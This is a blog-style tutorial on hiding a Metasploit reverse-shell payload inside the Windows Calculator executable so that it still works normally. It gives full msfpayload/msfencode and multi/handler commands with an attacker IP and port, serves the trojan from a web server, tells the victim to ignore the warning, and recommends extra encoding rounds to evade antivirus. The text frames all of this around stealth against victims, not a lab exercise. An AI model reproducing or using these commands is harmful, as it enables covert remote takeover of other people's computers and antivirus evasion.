In my previous posts i explained about Creating our own payload to gain access from victims machine.
But it had some problem when a targeted user launches a backdoored executable such as the one we just generated, nothing will appear to happen, and that can raise suspicions.
To improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application.
So i going to download a executable file working in windows 7, for that i choose Calculator program.
In this listing, we download the Calculator executable program and then access Calc using the -k flag is configures the payload to launch in a separate thread from the main executable so the application will behave normally while the payload is being executed.
When choosing to embed a payload in an executable, you should consider using GUI-based applications if you’re not specifying the -k flag. If you embed a payload into a console-based application, when the payload is run,it will display a console window that won’t close until you’re finished using the payload. If you choose a GUI-based application and do not specify the -k flag, when the payload is executed, the target will not see a console window.
Paying attention to these little details can help you remain stealthy during an engagement.
To msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
For Msfencode Options list type msfencode -h in terminal.
Let’s make our new backdoored executable.
#msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20 LPORT=8080 R | msfencode -t exe -x /home/sathish/Downloads/calc.exe -k -o /var/www/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
We add the R flag at to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder at the end with the count of 5 time and tell msfencode to send the executable output -o exe to /var/www/calc_backdoor.exe with -k option to keep template working; run payload in new thread. Finally, we run a quick check at to ensure that the resulting file is in fact a Windows executable.
I have already build webserver , so target machine can download the executable file from that server and execute it. We have a functional calc.exe and our shell.
It will prompt a warning notification, Ignore and run the executable.
Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen
for reverse shell connections.
#msf > use exploit/multi/handler
#msf exploit(handler) > show options
#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 8080
We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.
#msf exploit(handler) > exploit
Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer.
Then this will create a channel and you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on.
One more thing to remember that it will work fine,but its possible to catch by antivirus installed on the victims computer. so try encode with more counts with different encoders combinations.